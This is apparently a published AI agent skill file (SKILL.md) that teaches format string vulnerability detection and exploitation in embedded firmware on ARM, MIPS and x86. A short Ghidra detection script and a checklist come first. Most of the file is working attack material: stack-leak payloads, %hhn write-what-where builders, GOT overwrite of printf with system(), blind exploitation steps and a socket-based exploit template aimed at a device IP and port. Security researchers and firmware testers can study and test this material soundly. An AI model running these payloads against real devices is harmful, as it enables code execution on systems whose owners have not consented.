tangjunyi23

format-string-exploitation

Format string vulnerability detection and exploitation in embedded firmware binaries, covering ARM, MIPS, and x86 architectures

tangjunyi23 2 1 Updated 3mo ago
GitHub

Install

npx skillscat add tangjunyi23/iotagent/format-string-exploitation

Install via the SkillsCat registry.

SKILL.md

Format String Vulnerability Analysis

Overview

Format string vulnerabilities occur when user-controlled input is passed directly as the format argument to printf-family functions. In embedded systems, these are especially dangerous due to the typical absence of ASLR, stack canaries, and other mitigations.

Dangerous Function Identification

Target Functions

Function Library Risk Level
printf(user_input) libc Critical
fprintf(fp, user_input) libc Critical
sprintf(buf, user_input) libc Critical
snprintf(buf, n, user_input) libc Critical
syslog(priority, user_input) libc Critical
vprintf(user_input, va) libc Critical
dprintf(fd, user_input) libc High
err/warn(user_input) BSD libc High
setproctitle(user_input) BSD High
custom_log(user_input) vendor High

Detection via Static Analysis

# Search for direct format string usage patterns in binary
# These strings near printf calls suggest vulnerability:
strings firmware_binary | grep -n '%s\|%x\|%n\|%p\|%d'

# In disassembly: look for printf/sprintf where format string
# comes from register rather than .rodata/.data section

# Ghidra: cross-reference printf-family and check first format argument
# If format arg is on stack or from function parameter → likely vulnerable

Automated Detection with Ghidra

# Ghidra Python script: Detect potential format string vulnerabilities
from ghidra.program.model.symbol import SymbolType

PRINTF_FUNCS = ["printf", "fprintf", "sprintf", "snprintf", "syslog",
                "vprintf", "vsprintf", "vsnprintf", "dprintf",
                "warn", "warnx", "err", "errx"]

fm = currentProgram.getFunctionManager()
refMgr = currentProgram.getReferenceManager()
listing = currentProgram.getListing()

for func in fm.getFunctions(True):
    name = func.getName().lower()
    if any(pf in name for pf in PRINTF_FUNCS):
        refs = getReferencesTo(func.getEntryPoint())
        for ref in refs:
            caller = getFunctionContaining(ref.getFromAddress())
            if caller:
                print(f"[!] {func.getName()} called from {caller.getName()} @ {ref.getFromAddress()}")
                # TODO: Check if format argument is user-controlled

Exploitation Techniques

Information Disclosure

# Read stack values
AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x

# Direct parameter access (find offset where AAAA appears):
AAAA%1$08x  AAAA%2$08x  AAAA%3$08x  ...  AAAA%N$08x
# When output shows 41414141 → offset N is where input lands on stack

# Read arbitrary memory (once offset is known, e.g., N=7):
# Place target address at offset, use %s to dereference
python3 -c "import struct; print(struct.pack('<I', 0x080491a0).decode('latin1') + '%7\$s')"

Architecture-Specific Stack Layout

ARM (32-bit)

# Arguments 1-4 in R0-R3, remaining on stack
# Format string is typically R0 (printf) or R1 (fprintf/sprintf)
# Stack arguments start at offset where SP points

# Exploitation offset calculation:
# R0 = format string pointer
# R1-R3 = first 3 format arguments (from registers)
# Stack[0], Stack[1], ... = subsequent arguments
# Input buffer offset depends on function prologue
# Typical: input appears at offset 4-12 on stack

MIPS (32-bit)

# Arguments 1-4 in $a0-$a3, remaining on stack
# Format string in $a0
# $a1-$a3 cover first 3 format specifiers
# Stack arguments at SP+16, SP+20, ...

# MIPS calling convention reserves 16 bytes at top of stack
# for register save area (home area for $a0-$a3)
# This affects offset calculation by +4 words

# Note: MIPS has branch delay slots — exploitation requires
# careful gadget selection to account for delay slot instructions

x86 (32-bit)

# All arguments on stack, right-to-left push order
# Stack layout at printf call:
# ESP+0:  return address
# ESP+4:  format string pointer
# ESP+8:  arg1 (first %x reads this)
# ESP+12: arg2
# ...
# Input buffer typically at offset 5-15 words from format string

Write Primitive (%n)

# %n writes number of bytes printed so far to address on stack
# Direct parameter: %N$n writes to address at offset N

# Write arbitrary value strategy:
# 1. Place target address at known stack offset (e.g., offset 7)
# 2. Print exact number of characters needed
# 3. Use %n to write count to target address

# Example: Write 0x41424344 to address at offset 7
# Split into byte writes using %hhn (writes single byte):
# Write byte 0x44 (68 decimal):
python3 -c "
import struct
addr = 0x080491a0
# Write 4 bytes using %hhn (1 byte at a time)
payload  = struct.pack('<I', addr)      # byte 0
payload += struct.pack('<I', addr + 1)  # byte 1
payload += struct.pack('<I', addr + 2)  # byte 2
payload += struct.pack('<I', addr + 3)  # byte 3
# Offset 7 for first addr, 8 for second, etc.
payload += b'%52c%7\$hhn'   # writes 0x44 (68-16=52 padding)
payload += b'%1c%8\$hhn'    # writes 0x45 (69-68=1 padding)
payload += b'%1c%9\$hhn'    # writes 0x46
payload += b'%1c%10\$hhn'   # writes 0x47
print(payload.decode('latin1'))
"

GOT Overwrite (No RELRO)

# Overwrite Global Offset Table entry to redirect function calls
# 1. Identify target function's GOT entry address
# 2. Use format string %n to write shellcode address / system() address

# In embedded Linux with no ASLR:
# objdump -R binary | grep printf    → GOT entry for printf
# Overwrite printf@GOT → system@plt
# Next printf(user_input) call becomes system(user_input)

# Embedded bare-metal:
# Overwrite function pointer in interrupt vector table
# Or overwrite callback function pointer in global config struct

Embedded-Specific Considerations

No ASLR Exploitation

# Most embedded devices have no ASLR
# → All addresses are fixed and predictable
# → GOT addresses, stack addresses, heap addresses all constant
# → Single exploitation attempt sufficient (no brute force needed)

# Verify ASLR status:
cat /proc/sys/kernel/randomize_va_space
# 0 = disabled (common in embedded)

Bare-Metal / RTOS Targets

# On bare-metal or RTOS without MMU:
# - No GOT/PLT (statically linked)
# - Target function pointers in RAM:
#   - ISR vector table (if in RAM)
#   - Callback function pointers in structs
#   - Timer callback pointers
#   - Network receive handler pointers

# Memory layout is fully predictable from binary analysis

Limited Output Channels

# When printf output goes to:
# - UART only → connect serial to read output
# - Syslog → read /var/log/messages remotely
# - Buffer in memory → extract via other vulnerabilities
# - Nowhere (void context) → blind format string

# Blind format string exploitation:
# 1. Use %n to write without needing output
# 2. Overwrite return address or function pointer
# 3. Redirect execution to attacker-controlled payload
# 4. Confirm success via side channel (timing, network behavior)

PoC Template

#!/usr/bin/env python3
"""Format String Exploit Template for Embedded Target"""
import struct
import socket

TARGET_IP = "192.168.1.1"
TARGET_PORT = 80  # or telnet/custom service port

# Architecture: set pack format
ARCH = "arm"  # arm | mips | x86
ENDIAN = "<"  # < little-endian, > big-endian
PACK_FMT = f"{ENDIAN}I"  # 32-bit word

# Step 1: Find format string offset
def find_offset():
    """Send format strings to discover input offset on stack."""
    for i in range(1, 32):
        payload = f"AAAA%{i}$08x"
        resp = send_payload(payload)
        if "41414141" in resp:
            print(f"[+] Input at offset: {i}")
            return i
    return None

# Step 2: Build write-what-where payload
def build_payload(target_addr: int, value: int, offset: int) -> bytes:
    """Build %hhn payload to write 'value' to 'target_addr'."""
    payload = b""
    bytes_to_write = [(value >> (i * 8)) & 0xFF for i in range(4)]
    
    # Pack 4 target addresses
    for i in range(4):
        payload += struct.pack(PACK_FMT, target_addr + i)
    
    written = len(payload)
    for i, byte_val in enumerate(bytes_to_write):
        pad = (byte_val - written) % 256
        if pad > 0:
            payload += f"%{pad}c".encode()
        else:
            pass  # already at correct count
        payload += f"%{offset + i}$hhn".encode()
        written = byte_val
    
    return payload

def send_payload(payload):
    """Send payload to target — adapt to specific protocol."""
    # Adapt this for HTTP, Telnet, custom protocol, etc.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((TARGET_IP, TARGET_PORT))
    s.send(payload.encode() if isinstance(payload, str) else payload)
    resp = s.recv(4096)
    s.close()
    return resp.decode(errors='replace')

if __name__ == "__main__":
    offset = find_offset()
    if offset:
        print(f"[+] Building exploit for offset {offset}")
        # Example: overwrite GOT entry
        # payload = build_payload(GOT_ADDR, SYSTEM_ADDR, offset)
        # send_payload(payload)

Detection Checklist

  1. Static binariesstrings binary | grep -c '%' — high count near printf xrefs
  2. Decompiled code — format argument sourced from function parameter, not string literal
  3. Network input paths — HTTP headers, SNMP community strings, MQTT topics, syslog messages
  4. Config file parsers — hostname, SSID, device name fields used in log messages
  5. Web interface — CGI parameters passed to system logging functions